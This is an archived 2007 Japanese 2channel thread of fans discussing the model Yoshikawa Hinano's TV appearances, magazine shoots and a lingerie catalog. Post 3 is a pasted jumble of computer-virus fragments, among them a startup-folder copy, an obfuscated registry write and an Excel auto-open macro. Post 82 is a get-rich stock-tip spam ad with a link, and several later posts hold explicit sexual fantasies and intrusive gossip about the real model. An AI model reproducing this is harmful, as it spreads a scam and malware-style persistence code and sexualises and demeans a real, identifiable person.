5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

:・’゜☆。.吉川ひなの.Vol.5.:*:・’:・’゜☆

1 :無名モデル:2007/06/13(水) 22:52:52 ID:5jlWLpKv
レイシャスの新ミューズに吉川ひなの!
これから沢山CMでるかと思うと楽しみです。

・・・だれか昨年秋のDior(コスメ)の雑誌広告ひなの画像もってたら下さい。

(前スレ)
:・’゜☆。.吉川ひなの.Vol.4.:*:・’:・’゜☆
http://life8.2ch.net/test/read.cgi/model/1150406703/

2 :無名モデル:2007/06/13(水) 22:55:23 ID:???
2 :無名モデル:2006/06/16(金) 14:08:14 ID:???
伊勢丹のポスター出た時は衝撃だったわ

3 :無名モデル:2007/06/13(水) 23:01:48 ID:???
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


4 :無名モデル:2007/06/14(木) 01:15:15 ID:DVkcTBJ+
はねとび見たけど太った?二輪郭やばくない?重あごでなんかしもぶくれだったし凄いブスになっててショック

5 :無名モデル:2007/06/14(木) 01:38:53 ID:F3O06EDa
あの喋り方はないと…もう若くないんだしなんとかしたらいいと思う
最近若くみせようとしてる?全盛期にあのヘアスタイルだったら良かったのに…人の言うことを聞けない頭がおかしい一歩手前の人なんだよね…


最低

ただのマネキン

6 :無名モデル:2007/06/14(木) 09:05:30 ID:+f9vocyr
モデルなんだからマネキンで十分。あんたなんてマネキンでもない不細工なボロ人形

7 :無名モデル:2007/06/14(木) 11:38:23 ID:???
ひなのより美しい日本人モデルいないけど、アラ探して文句つける人は自分のが心も見た目も美しいと思ってるんだろうね、
可哀想な勘違いおばさん…

8 :無名モデル:2007/06/14(木) 14:42:44 ID:???
あの、とりあえず、>>1、乙!!

9 :無名モデル:2007/06/15(金) 22:15:45 ID:???
>>7
マジレスすると吉川ひなのは純日本人ではない。


10 :無名モデル:2007/06/22(金) 06:22:02 ID:/k18k2SB
ワンピ似合うか?

11 :無名モデル:2007/06/22(金) 17:17:55 ID:CHpoT/gx
吉川ひなのは茶髪が無茶苦茶にあう。そして無茶苦茶かわいい。
ひなのの場合スタイルがいい。
ひなのの場合顔がかわいい。
ひなのの場合顔が小さい。
ひなのの場合なに着ても似合う。
ひなのの場合個性のあるモデル。

12 :無名モデル:2007/06/23(土) 17:46:03 ID:ETxFo427
ひなのの大ファン発見。

13 :無名モデル:2007/06/24(日) 08:48:43 ID:vEXDxRR6
今のモデルは小粒うんぬんって発想はいかにもババ臭いなあと思うんだが。
90年代のモデルと今のモデルでは取り巻く状況も違うし。
今のモデルはバックステージでは素朴で普通っぽくても、ランウェイやスチールでは驚く程輝く子もいるし、
逆に90年代のモデルは個性的なようで実はリッチでゴージャスって枠に皆はまってたりする。
ひなのとかも好きだけど、遅刻当たり前でクリエイターに対しても偉そうな態度だったりするのは個人的にはプロ意識低いと思うし。
私はどちらのタイプのモデルも好きだけど。

14 :無名モデル:2007/06/24(日) 17:43:12 ID:jor6K+/r
最近のモデルは雑誌専属が多い。
そこで取り上げてもらって目立つようにして
人気をだすんだよね。
ひなのはフリーのモデルであっという間に人気がでてすごい。
売れたくてモデルからスタートしたがる人も増えたよね
でもモデル。一筋の人がいてもいいのにな。


15 :無名モデル:2007/06/25(月) 06:25:55 ID:fCuhtLm7
顔はめっちゃ可愛くて・・・☆

16 :無名モデル:2007/06/25(月) 17:25:16 ID:rnLpf7oY
手足長くてスタイル抜群・・・・☆
それがひなの。

17 :無名モデル:2007/06/27(水) 12:22:24 ID:???
14歳のときが最盛期だったよね・・・
この前ブクオフ行ったら、紀信撮影の『ひなのがぴょんぴょん』が売られてた。
やっぱりあの頃のひなのは神クラスに可愛かった。
なんだか悲しくなった。

18 :無名モデル:2007/06/27(水) 17:37:08 ID:FPJxYYyO
14歳で、あの顔で胸がFかっぷあれば、プロポーズしていたね
髪は黒が好き

19 :無名モデル:2007/06/27(水) 19:27:54 ID:ht8OhWqM
可愛すぎます!!!

20 :無名モデル:2007/06/27(水) 19:58:28 ID:kZmzczPc
ひなのちゃんって胸でかいの?

21 :無名モデル:2007/06/27(水) 20:27:57 ID:ht8OhWqM
惹かれるなぁ!!

22 :無名モデル:2007/07/01(日) 10:59:44 ID:???
>>7
あんた完全2ちゃん脳だな

23 :無名モデル:2007/07/04(水) 07:31:12 ID:O90w2FgA
可愛すぎます!!!

24 :無名モデル:2007/07/04(水) 08:27:17 ID:???
ハーフだって知らなかった。そういわれてみれば、鼻の整ったフィリピーナだね。
自分にとってはネ申だが

25 :無名モデル:2007/07/04(水) 08:29:54 ID:???
金髪のハシリだったよね。なつかしぃ

26 :無名モデル:2007/07/04(水) 10:06:21 ID:eJmVKxBw
純日本人てひなのちゃんが言ってたのはウソ???父母どっちがフィリピン??(@_@;)

27 :無名モデル:2007/07/05(木) 22:25:31 ID:8QU7xQUZ
本物の美女が似合う髪型はロングヘアーで、前髪一直線と
センターパーツだけ、ひなのは、どっちも似合う

28 :無名モデル:2007/07/06(金) 09:43:04 ID:???
ひなのちゃん、ニンテンドーDSはキティの加工で、PSPはピンクですね。
携帯電話は、スワロフスキーでデコレーションしたそうですが…やっぱりピンク系なのかな。

29 :無名モデル:2007/07/14(土) 23:47:39 ID:PTSIh1ds
失礼なAD
http://vision.ameba.jp/watch.do?movie=515456

30 :無名モデル:2007/07/16(月) 14:20:08 ID:???
ひなのちゃんかわいいな
もっと雑誌とか出て欲しいんだけど
てゆうか、「何故お前が」みたいな人が出てるのに
ひなのちゃんをもっと見せて欲しいよ

31 :無名モデル:2007/07/17(火) 13:28:30 ID:x6I8ELgf
27歳に見えない!

32 :無名モデル:2007/07/25(水) 21:56:33 ID:4+pwsD4G
ハニカミ前出てたジャン
2回目?

33 :無名モデル:2007/07/25(水) 22:28:11 ID:rTol7vxq
生で見た時、ネ申がいる!!と思って本当に見とれた〜☆

34 :無名モデル:2007/07/26(木) 11:39:28 ID:OI5o61de
あげて言うけど、前スレ埋めてからこっち使え!

35 :無名モデル:2007/07/28(土) 15:41:11 ID:t5DPg93v
確かに可愛い。

36 :無名モデル:2007/07/28(土) 16:18:37 ID:SP8qT4ii
ひなのちゃんは全く整形してなくてあの可愛さとスタイルだって聞いた。凄いよねぇ…

37 :無名モデル:2007/07/28(土) 16:28:37 ID:???
混血だしね。本当最近また可愛い。

38 :無名モデル:2007/07/28(土) 17:29:02 ID:1jozBPhw
今月のSCawaでひなのクルミ着てるよ。かわいいよ〜。やっぱり顔はダントツでかわいいと思うな。

39 :無名モデル:2007/07/28(土) 17:56:11 ID:ttOyHDAF
>>36
目は整形したんじゃなかった?
目の幅もっとせまかったよな

40 :無名モデル:2007/07/28(土) 19:37:44 ID:uqZDTFhA
お人形さんみたいで可愛いね 喋らなかったら

41 :無名モデル:2007/08/03(金) 16:58:54 ID:???
今ひなのちゃんが クチコミって番組に出てる!顔小 さいなー

42 :無名モデル:2007/08/06(月) 06:47:05 ID:???
もう新しいスレあったんだ・・・。前スレまだ生きてるよ。

ひなのマジ可愛い。顔小さすぎ!目大きすぎ!

43 :無名モデル:2007/08/06(月) 06:49:46 ID:???
>>36

ひなのは整形してる。でもする前から神のように可愛い。

44 :無名モデル:2007/08/06(月) 13:03:15 ID:L7qWZeXm
今ごきげんようにでてるage

45 :無名モデル:2007/08/06(月) 13:15:02 ID:???
可愛い可愛い

46 :無名モデル:2007/08/06(月) 17:13:27 ID:???
まさにチワワみたい!チワワにバンビにバービーって感じ。それで天然お馬鹿さんキャラだから大好き(笑)

47 :無名モデル:2007/08/06(月) 21:56:22 ID:nZUKfq3z
ひなのマジかわい〜!!
元祖ハーフ人形系モデルだよ!

もっとテレビでてほしー

あゆとか倖田とかしょこたん、、、もぅいらないからー

48 :無名モデル:2007/08/06(月) 22:35:06 ID:tqCs3/nI

ひなのちゃん本当にかわいいよね


49 :無名モデル:2007/08/06(月) 23:29:34 ID:nZUKfq3z
人形

50 :無名モデル:2007/08/07(火) 09:56:27 ID:PbzgufAk
かわいすぎ!
化粧こくないのにあの目のでかさ!

51 :無名モデル:2007/08/08(水) 01:02:46 ID:haRaW3KQ
ひなのちゃんの写真集、希望。
事務所、企画力のある奴いねえのか!!

52 :無名モデル:2007/08/08(水) 13:09:54 ID:tFG9z6qX
ごきげんよう出てるの今日知ったorz
月曜と火曜の衣装、髪型などどんなのだったか
見た人教えてほしいです!

53 :無名モデル:2007/08/08(水) 13:24:20 ID:OFK7tqwJ
可愛い可愛い!
あの髪型が一番可愛いよねっ!

54 :無名モデル:2007/08/08(水) 13:38:33 ID:???
月曜:白いピタT。襟と袖に黒い縁取りで、フロントにプリントがあったよ。
その上に濃目のグレーのベストを羽織って、薄目のグレーの帽子、
黒いハイヒールに、デニムのショーパン。髪型はダウンスタイル。
見なかったの?もったいない。可愛かったのに。

火曜:薄い檸檬色で膝上丈のの半袖ワンピ。グリーンのハイヒール。
髪型は水曜日と同じ。
見なかったの?お気の毒。可愛かったのに。

水曜
見れて良かったね。ブーツが効いてて、超可愛かったね!!
今日が一番可愛かったよ。安心おし。

ピアスと時計は3日間とも同じでした。多分1日で3回撮ってるね。

55 :無名モデル:2007/08/08(水) 13:42:05 ID:???
ごきげんようのひなのちゃん、めっちゃ可愛かったー!!
顔小さすぎ、足長すぎ!!!目でか!!
2日間見逃しちゃったけど、今日観れて良かった!!
次はいつテレビ出るか知ってる人居ますか??

56 :無名モデル:2007/08/08(水) 13:55:09 ID:/S2syeqn
人間とは思えない。人形?完璧です。

57 :無名モデル:2007/08/08(水) 14:06:43 ID:???
>>54
詳しくありがとう!
二日間見れなかったのは本当に残念だったけど
今日見れてよかった!!
最近TVの露出増えて嬉しい〜

58 :無名モデル:2007/08/08(水) 15:33:34 ID:OFK7tqwJ
ひなのちゃんの画像とか欲しいなー。サイトとかないのかな?可愛すぎ!髪の色はアッシュ系の明るめブラウン?

59 :無名モデル:2007/08/08(水) 18:25:04 ID:CWVYTNBo
ひなのちぁん本当に可愛いね!今日のごきげんようのひなのちぁん可愛いすぎました!

60 :無名モデル:2007/08/08(水) 18:55:19 ID:zli/dSEf
ひなの、きちんと話せるようになったね。
目上の人への礼儀もしっかりしてきたし。
結婚離婚とか、ひなのを成長するためには良かったんじゃない?
相変わらず、かわいいし。ポストひなのはいないんだし、もっと露出して欲しいな。

61 :無名モデル:2007/08/09(木) 00:25:06 ID:ZHwz7fJf
ごきげんようは、一日で一週間分撮るんだよ。
小堺とマチャアキとならんでると、同じ生き物と思えない体型と顔の
小ささだね。

62 :無名モデル:2007/08/09(木) 04:40:11 ID:8Vw7TNuU
こんな可愛い人と同じ性別なのが嬉しいです。奇跡な可愛さ

63 :無名モデル:2007/08/09(木) 06:07:33 ID:pqZ+CCqv
>>62
性別が一緒で嬉しいって馬鹿かおまえw
気持ち悪いw

64 :無名モデル:2007/08/09(木) 08:40:56 ID:???
生え際〜顎までが19センチ
頭のてっぺん〜顎までが21センチ
なんだよね?
だけどもっと顔が小さく見える…
身長が168センチだから21センチあれば十分8等身なんだけどさ。
前髪のせいで余計顔が小さく見えるのかな?
なんか顔が小さすぎて変な感じw

65 :無名モデル:2007/08/10(金) 02:53:37 ID:???
>>58
http://home.scarlet.be/~ping9712/hinano%202.jpg
http://home.scarlet.be/~ping9712/hinano%208.jpg
http://images.amazon.com/images/P/4087802760.09._SCLZZZZZZZ_.jpg
http://pc.watch.impress.co.jp/docs/2003/yajiuma/11/hinano_8.jpg
http://www.senoh.com/hinano/image/002.jpg

http://www.lck.bias.ne.jp/~nanairob/hinano/hinatop.html




66 :無名モデル:2007/08/10(金) 02:59:59 ID:???
http://www.lck.bias.ne.jp/~nanairob/hinano/olive.html
http://www.lck.bias.ne.jp/~nanairob/hinano/hyon.html
http://www.lck.bias.ne.jp/~nanairob/hinano/pyon2.html

神レベル

67 :無名モデル:2007/08/10(金) 03:34:57 ID:???
今でも、やっぱ可愛いよな。
うらやまー

68 :無名モデル:2007/08/10(金) 07:40:04 ID:ZStm/4ct
>>64
そのスペックは合ってるよ。普段8等身の人って見慣れてないし変な感じなんだと思う。外人でも8等身は珍しいからね。
>>65-66
懐かしい!切り抜き集めてたなw改めて昔のひなのを見るとやっぱりフィリピーナだよね。近くに住んでるフィリピンハーフの子に激似!

69 :無名モデル:2007/08/11(土) 04:17:55 ID:???
youtube観たけど

ごきげんよう相変わらず要領を得ない喋りだった。お兄ちゃんの話。
落ちもないし
こりゃトークで生き残るの無理だわ。エッセイはそれなりに面白いのにね。


70 :無名モデル:2007/08/11(土) 04:50:47 ID:kDSe6MKK
>>58
ひなのちゃん可愛すぎる〜天使だ(´д`)
http://imepita.jp/20070811/170990
http://imepita.jp/20070811/171200
http://imepita.jp/20070811/171560
http://imepita.jp/20070811/171760
http://imepita.jp/20070811/171940
http://imepita.jp/20070811/172160

71 ::2007/08/11(土) 10:18:26 ID:KyT9qb+N
ひなのちゃん今度下着のブランドのPEACHJHONのイメージモデルやるらしいよ。

72 :無名モデル:2007/08/12(日) 16:34:27 ID:nE8OpQB1
次回のPjから載るの?

73 :無名モデル:2007/08/14(火) 13:56:49 ID:SlWPLGr/
今月のSweetも
ひなのいっぱい載ってて嬉しい!

74 :無名モデル:2007/08/16(木) 10:25:52 ID:???
すまん
今朝のサンスポのPJひなので
初めて抜いてしまった。

75 :無名モデル:2007/08/16(木) 16:54:04 ID:???
フィリピンハーフは美人が多いな裏山

76 :無名モデル:2007/08/16(木) 22:50:18 ID:DYeVXzvi
今日これから深夜0:29〜TBSのオリラジに出るみたい。
オリエンタルラジオ好きじゃないけど見てみよう

77 :無名モデル:2007/08/17(金) 00:43:41 ID:zo78wqLV
出てるw可愛いいよ

78 :無名モデル:2007/08/17(金) 00:44:24 ID:v2OoUpOz
ひなの頭小さすぎだろww

きもちわるいww
脳みその大きさどんくらいなんだろうかw

79 :無名モデル:2007/08/17(金) 00:48:23 ID:0hxjc/3s
あっちゃんと並ぶと顔の小ささが
より目立つね。
てかリアルにあっちゃんの半分しか顔の大きさないね

80 :無名モデル:2007/08/17(金) 00:52:46 ID:B/rnm1uL
オリラジに挟まれてるとひなのが遠くに見える。
遠近感がおかしくなる

81 :無名モデル:2007/08/17(金) 00:54:37 ID:v2OoUpOz
>>79
それだよ、それ!www
藤森だって、男の中では絶対顔ちっちゃい方だと思うけど、もう、比じゃないもんwww

恐るべし、ひなのww


82 :ひでみん :2007/08/17(金) 00:56:01 ID:???
初めて、株をやってみました。(^^)vv
実は前にナンバーズで600万円当てたことがあって、、、
600万円とかって 人に言えないくらいすごいよね
使っても そうそうなくならないでしょって思ってたんだけど
通帳をチェックしたら もう38万円しか残ってない 

友達に 正直にもうお金なくなりそう どうしよう、、、
って相談したら 株の情報のホームページの事教えてもらって

でも 「株なんて全然分かんないよ」 って言ったら
「私も 全然分かんないけど すっごい簡単だから やってみ」
って言う事で やったら2週間で 16万円!にもなった!

http://atk.jp/pafz
株がまったくわからない方は、無料のメール読んでみれば驚くよ。
みんなも儲かったら教えてね 
来週は ハワイです〜 アロハ〜〜

83 :ぴあの:2007/08/17(金) 00:57:23 ID:bv3oPHWQ
お人形さんみたぃ"(ノ><)ノとなりにいたら自分が惨めになるな

84 :無名モデル:2007/08/17(金) 00:58:25 ID:zo78wqLV
人形みたいだね。
びっくりした!


85 :無名モデル:2007/08/17(金) 05:50:24 ID:0hxjc/3s
今回のPJ、ひなの下着姿で載るみたいよ〜

86 :無名モデル:2007/08/17(金) 05:51:17 ID:???
すみません、ひなのってブログはやってないですよね?

87 :無名モデル:2007/08/17(金) 06:37:23 ID:???
86 : すくつ(東日本):2007/08/16(木) 18:32:34 ID:sn/A0spM0
ピーチジョンのイメージキャラクター時代、カタログ内の連載でフィリピン人である母や、妹との写真を毎月数点公開していた。


これマジ?
ママと妹の顔みたいよ〜だれかうpきぼん

88 :無名モデル:2007/08/17(金) 07:23:05 ID:0hxjc/3s
>>87
前回のイメージモデルだった時のPJ
全部持ってるけど家族の写真はなかったと思う。

でも妹はひなのがセブンティーンの連載してた時
普通に顔だしして載ってたよ
個人的には妹よりひなのの方が可愛いと思った

89 :無名モデル:2007/08/17(金) 18:10:57 ID:???
>>87
うろ覚えなんだけど家族写真見た事ある。
お父さんが髭眼鏡、お母さんがアジア系のくっきり顔。
白黒写真だから美人かどうかはまで判断できなかったけど
巷で騒がれてた白人ハーフ説は嘘だと当時確信したw

90 :無名モデル:2007/08/17(金) 19:22:31 ID:MHZfHdZh
7. Posted by  "Y" 2007年08月16日 20:22
喫煙で痩せるなんて聞いたコトないぞ!
俺はタバコ吸う女性はあまり好きじゃないけど、喫煙はゅらんさんの自由だから好きにしていいよ。
ゅらんさんはブログたくさん書けて羨ましいよ。俺は非・自主的に文字数制限だから・・・
書きたいなぁ〜
でも我慢!我慢!煩い小姑達が見張っているから・・・(笑)
明日の夜には帰ります!


91 :無名モデル:2007/08/18(土) 00:42:16 ID:???

PJのモデル、今回だけっぽいね

季刊誌だけど、冬号は期待せずにおこうと思った


92 :無名モデル:2007/08/19(日) 11:58:42 ID:???
>>89
いいなーupしてよ

93 :無名モデル:2007/08/20(月) 15:04:36 ID:???
PJてエロイの?

94 :無名モデル:2007/08/20(月) 17:30:35 ID:yMZFrp+J
>>93
今日カタログ届いた!
エロいって何が?雑誌がエロ雑誌かって事?
普通の下着や服の通販カタログだよ。
ひなの下着姿だけどエロさとかなくて
健康的で綺麗だし可愛いよ!

95 :無名モデル:2007/08/20(月) 17:32:45 ID:???
下着買うの?

96 :無名モデル:2007/08/20(月) 19:13:35 ID:???
買ったことあるけど、
一回洗濯したらもう終わり。
そんな下着は二度と買わないが、
ひなのは可愛いのでカタログは貰う。

97 :無名モデル:2007/08/21(火) 00:21:34 ID:2lOBdzqD
PJの表紙、誰かupして〜

98 :無名モデル:2007/08/21(火) 00:33:10 ID:???
>>97
確か今日発売だからコンビニなり本屋なり行けば
見れるよ。ただ通販用カタログと書店やコンビニに並ぶカタログと
表紙の写真若干違うのかね?
CMだと表紙は上半身アップだったけど
今日届いたのは全身の表紙だったからさー。

99 :無名モデル:2007/08/21(火) 00:53:37 ID:2lOBdzqD
>>98
早速の情報あり^^
コンビニ=上半身、書店=全身らしいから、
明日書店へ行ってみよ・・・
って、男でも見れるところにおいてあるのか??

100 :無名モデル:2007/08/21(火) 00:53:50 ID:???
ttp://www.peachjohn.co.jp/images/pj/leftnavi/P_Lnavi_catalogue62.jpg

101 :無名モデル:2007/08/21(火) 00:57:40 ID:2lOBdzqD
>>100
その画像はすでにゲットしたおw
今度は全身を見てみたい・・・

102 :無名モデル:2007/08/21(火) 01:25:24 ID:???
おっぱいおおきいお

103 :無名モデル:2007/08/21(火) 02:07:12 ID:???
上半身アップのはかなり胸に詰め物入れてるね
全身ので見るとそうでもないよ

104 :無名モデル:2007/08/21(火) 02:11:51 ID:???
>>99
コンビニとかだと女性誌の所で
本屋だともうすこし細かく分類されてる所多いから
少し見つけにくいかも。
でもやっぱ女性誌の近くに大概あると思うよ。
ちなみに300円くらいだよ。

105 :無名モデル:2007/08/21(火) 02:18:13 ID:???
やっぱ街売りと配布用では表紙が違うね。

http://vista.crap.jp/img/vi8731166891.jpg


106 :無名モデル:2007/08/21(火) 09:18:56 ID:???
カタログだと
全身映ってるな。
妹に送られてきたやつ
見せてもらった

107 :無名モデル:2007/08/21(火) 13:59:39 ID:4GFcJRuS
もっとカタログ画像貼ってくれよおおおおおおおおおおおおおおお
全然抜けねえじゃん

108 :無名モデル:2007/08/21(火) 14:45:26 ID:???
>>105
GJGJGJ

109 :無名モデル:2007/08/22(水) 03:13:00 ID:???
ひなのちゃんとモデル(名前忘れた)が、
レズ設定でエロい下着姿で絡んでる画像あったらほしい!誰かお願い.....

110 :無名モデル:2007/08/22(水) 10:51:14 ID:???
>>109
SHIHOだね

111 :無名モデル:2007/08/22(水) 12:10:46 ID:KR2J/Apc
>>110
そうです!シホ。よく知ってましたね。さすが....
あれまたみたい。

112 :無名モデル:2007/08/22(水) 18:03:04 ID:???
PJのカタログコンビニで読んだよー

マジでカワイイね。

113 :無名モデル:2007/08/22(水) 21:33:15 ID:G2OdDR4R
ひなのちゃんてブログとかやってないのかなー?

114 :無名モデル:2007/08/22(水) 21:35:56 ID:???

http://life8.2ch.net/test/read.cgi/model/1179515190/l50

こいつらはキチガイと同じだな。

http://www.topmodel.jp/



115 :無名モデル:2007/08/23(木) 14:14:30 ID:???
PJのカタログ届かない・・・なんでだろ?
パクられちゃったかな
みんな届いてるみたいなのに

116 :無名モデル:2007/08/23(木) 17:29:39 ID:EOxura7B
>>115
一定期間以上PJの商品買ってないから来ないとか?

117 :無名モデル:2007/08/24(金) 14:17:03 ID:JqMhm3Vg
うちもこなくなった

118 :無名モデル:2007/08/24(金) 15:37:39 ID:???
うちもこなくなったからカタログ請求したよ
早くこないかなー

119 :無名モデル:2007/08/24(金) 20:26:25 ID:???
今回初めてなんだけど、カタログ請求した
17日に登録したのにまだ来ないよ

120 :無名モデル:2007/08/24(金) 21:28:38 ID:???
そんなに来ないんだ…今回は買いに行こうかな

121 :無名モデル:2007/08/26(日) 07:45:41 ID:???
胸は整形してますよね??

122 :無名モデル:2007/08/26(日) 14:13:56 ID:???
日本語でおk

123 :無名モデル:2007/08/26(日) 22:57:43 ID:vi3bQYB2
ごきげんようのひなのリスカの跡がすごかった。
左手。
隠さないんだって驚いたよ。

124 :無名モデル:2007/08/27(月) 13:11:09 ID:???
リスカの跡があろうと…昔のひなのが良いっていう人いるけど
今のひなのが大好きだよ

125 :無名モデル:2007/08/27(月) 17:01:03 ID:???
>>121
胸は豊胸でしょ

126 :無名モデル:2007/08/27(月) 23:16:55 ID:dPCX6Mdb
あんな容姿に生まれたら、さぞやヒャッホーなエブリディかと思いきや
なんでリスカなんかするんだろう

127 :無名モデル:2007/08/28(火) 00:07:18 ID:mc0eZRnR
ブス、デブに限って開き直って幸せそうじゃん!

128 :無名モデル:2007/08/28(火) 13:54:35 ID:u8SzqgbU
まぁヒドイ

129 :無名モデル:2007/08/28(火) 20:16:29 ID:???
でもたしかにいるよね そうゆうひと
あたまのつかいかたが ちがうんだろうね

悩み多き美人
開き直ったブス&デブ

どっちになりたいかは
なやむことでもないけれども。

130 :無名モデル:2007/08/29(水) 12:27:42 ID:Yp68HOw1
PJの表紙もPINKYの連載も超可愛かった…

131 :無名モデル:2007/08/29(水) 14:00:15 ID:GRqaXBeP
リスカしてるんだね

132 :無名モデル:2007/08/29(水) 15:07:57 ID:???
ひなのがもっと見たいー!!

133 :無名モデル:2007/08/31(金) 15:30:35 ID:Bc4H+sJu
今朝さ
新聞を取りにポストに向かったのさ
ポストを開けたらPJのカタログが来てた
妹が頼んだらしい
ひなのちゃんのエロエロしい姿が
迷わず盗んだ
やったぜ!!!

134 :無名モデル:2007/08/31(金) 15:56:11 ID:???

こんな記事が

吉川ひなのも… お風呂に入らない女たち
ttp://news.ameba.jp/2007/08/6808.php



135 :無名モデル:2007/08/31(金) 16:51:58 ID:???
>>133
ネタかもしれんが一応・・・
返してやれ
あとで問題になるぞ
妹がPJに配達されてないとか
確認して、郵便局員の未配達とか変な方向に
いったら、収拾つかなくなるぞ


136 :無名モデル:2007/08/31(金) 18:30:56 ID:Bc4H+sJu
>>135
もうビニール引き裂いてしまったよ…
今更返せないぜ


137 :無名モデル:2007/08/31(金) 18:52:21 ID:???
ページくっついてるしな・・・

138 :無名モデル:2007/08/31(金) 21:43:54 ID:Bc4H+sJu
>>137
……うん


139 :無名モデル:2007/08/31(金) 23:23:13 ID:???
そんなにエロく感じるものなの男性からすると?


140 :無名モデル:2007/08/31(金) 23:26:46 ID:???
彼女芸暦長しかなり強いよ。じゃなきゃ引退してる。

141 :無名モデル:2007/09/01(土) 01:57:16 ID:???
とりあえずうpしてくれたら妹には内緒にしとく
確か本屋で売ってるのよりエロいんだよね?

142 :無名モデル:2007/09/01(土) 12:27:55 ID:???
いやエロくないよ。

143 :無名モデル:2007/09/01(土) 17:24:39 ID:???
いや、あの今回のPJは相当エロいだろ

アイマスクしてるのかいーね

144 :無名モデル:2007/09/01(土) 22:29:38 ID:???
エロさは感じなかった。

145 :無名モデル:2007/09/01(土) 22:30:42 ID:???
5回ヌいた

146 :無名モデル:2007/09/03(月) 01:03:01 ID:sWqOiy9n
まずPJのひなので気持ち良く程よく勃起させる

PJとAVを交互に見ながらシコシコ
頭の中じゃひなのがブラとパンツを外して、俺の上にまたがり、おっぱい揺らして腰をクネクネ
そしてひなのの顔にフィニッシュ!

147 :無名モデル:2007/09/03(月) 01:04:25 ID:???
>>146

プロの方ですね?

148 :無名モデル:2007/09/03(月) 20:50:03 ID:???
うちに2冊あるからどっちかいる?

149 :無名モデル:2007/09/05(水) 04:19:05 ID:KGCu8he9
>>148
ページがビチビチにくっついてる方をください
それがあれば犯されたひなのをリアルに想像して怒りに狂いながらシコシコできる
怒ナニーは気持ち良いんだよな

150 :無名モデル:2007/09/05(水) 16:52:22 ID:SEVAN/dL
豊胸じゃないよ!昔から胸あったから!

151 :無名モデル:2007/09/06(木) 12:56:55 ID:pYFgvS7X
ピーチジョンの表紙乳でっかくてびっくりした。服着たらペタンコなのにね

152 :無名モデル:2007/09/06(木) 14:39:39 ID:hAF6RbTM
中学生の時ハイドと付き合ってたね


153 :無名モデル:2007/09/06(木) 16:15:59 ID:???
淫の行

154 :無名モデル:2007/09/07(金) 00:17:25 ID:???
ひなのやジェシカの髪大好き。

155 :無名モデル:2007/09/07(金) 00:56:34 ID:???
155 :無名モデル:2006/09/20(水) 21:40:49 ID:???
舞台とスピカの歌のライブを一番前でまじまじと見たけどほんとに可愛い。
写真写り悪い?ってくらい実物のほうがキレイ
ため息でるよ

156 :無名モデル:2007/09/07(金) 12:42:13 ID:???
今回のに味をしめて
アンアンあたりで
ヌードとかになりそうな予感
あれは同性受けいいからな

157 :無名モデル:2007/09/07(金) 22:27:18 ID:???
えー、下着姿でさえ今回が最初で最後って言ってるよ

158 :無名モデル:2007/09/08(土) 21:19:48 ID:jk0BUslq
脱ぐなら篠山紀信だと思う
ついでに宣伝で少しananだな
脱いでもいいけど脱がなくてもいい
ひなのはかわいい

159 :無名モデル:2007/09/10(月) 17:29:55 ID:Z6JPNC05
イマカタログタノンダ

ttps://www.peachjohn.co.jp/catalog/catalogue_get.html

160 :無名モデル:2007/09/22(土) 04:17:40 ID:???
あげ

161 :無名モデル:2007/09/24(月) 14:03:11 ID:nVcPHcWY
SWEETのひなのタソに(;´Д`)ハァハァしてしまた


162 :無名モデル:2007/09/25(火) 09:15:50 ID:???
>>161
ほんっと可愛いよね〜
ハアハアはしなかったけど、
ため息は出たわ、可愛すぎて。

163 :無名モデル:2007/09/25(火) 15:19:53 ID:???
>>162
テラカワュス(*´д`*)アハァ
自分の中でのベストショットは、白のタンクに黒のチュールスカート着てるひなのタソ。

あの顔たまらん


164 :無名モデル:2007/09/26(水) 09:32:32 ID:???
>>164
1ページ目のひなのが良かったと思ったよ
アハアはしなかったけど。

165 :無名モデル:2007/09/27(木) 16:58:36 ID:???
vnnvxdnnxfv





fnsnffns






mfmmggdmdg




dgdsgs



gndgnd







166 :無名モデル:2007/09/28(金) 00:28:10 ID:9qG+WGfP
なんてことだ!これはめずらしいw純粋なファン(女の子)と変態オナニー男どもが仲良く共存してるwwこんなスレはじめてみたwww

167 :無名モデル:2007/09/28(金) 22:44:28 ID:???
ひなのはひなの(はあと)

168 :無名モデル:2007/09/29(土) 09:13:20 ID:???
PINKY
Looks秋
steady
JJ
も可愛かったよ

UPはちょっと、えげつないメイクを施されて
ひなのの可愛さ台無しにされちゃってたけど。
ま、それも、たまにはいいかな。

169 :無名モデル:2007/10/02(火) 09:45:37 ID:???

ひなの不足の毎日

もっと色んなメディアに露出してくれ

170 :無名モデル:2007/10/02(火) 23:21:29 ID:???
ひなのーおやすみっすー!またにー


171 :無名モデル:2007/10/12(金) 10:39:25 ID:8cF7liJr
171 :ノーブランドさん :04/06/21 10:39
白ノースリワンピにピンクカーデ、
白かピンクのミュールに薪薪ヘアーで
決まりだ!

172 :無名モデル:2007/10/17(水) 21:55:55 ID:???

ひなのって

横から見たら

スネ夫に激似

173 :無名モデル:2007/10/20(土) 12:15:03 ID:IPibht1R
スゥィートかわいかった

174 :無名モデル:2007/10/20(土) 13:13:34 ID:???
本当?
じゃあ、ちょっと、
チェックしてみようっと。

175 :無名モデル:2007/10/21(日) 03:37:17 ID:???
六本木駅の日比谷線のホームにひなののSWEETのポスターが何種類も並べて
貼ってあった!
すごく可愛かったー!!

176 :無名モデル:2007/10/26(金) 14:27:24 ID:???
先日の川崎のイベントでモデルしたの見た人いる?
もう至近距離で見てたけど印象は、もの凄く可愛かったけど
恐ろしく顔小さくて驚いたよ。

